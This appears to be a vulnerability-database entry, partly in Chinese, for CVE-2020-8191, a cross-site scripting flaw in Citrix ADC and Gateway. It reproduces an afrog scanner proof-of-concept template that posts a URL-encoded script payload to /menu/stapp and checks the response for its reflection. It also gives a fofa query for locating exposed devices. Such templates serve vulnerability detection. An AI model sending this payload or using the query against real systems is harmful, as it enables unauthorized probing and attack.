CVE-2020-8191: citrix-cve-2020-8191-xss

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Citrix ADC and Citrix Gateway 13.0 before 13.0-65.13, 12.1 before 12.1-55.13, 12.0 before 12.0-65.13, and 11.1 before 11.1-65.13 contain a cross-site scripting vulnerability. fofa: "Citrix ADC"

PoC代码[已公开]

id: CVE-2020-8191

info:
  name: citrix-cve-2020-8191-xss
  author: JingLing
  severity: medium
  description: |-
    Citrix ADC and Citrix Gateway 13.0 before 13.0-65.13, 12.1 before 12.1-55.13, 12.0 before 12.0-65.13, and 11.1 before 11.1-65.13 contain a cross-site scripting vulnerability.
    fofa: "Citrix ADC"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
  tags: cve,cve2020,citrix,xss
  created: 2023/08/17

set:
  r1: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /menu/stapp
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
      follow_redirects: true
    expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-8191.yaml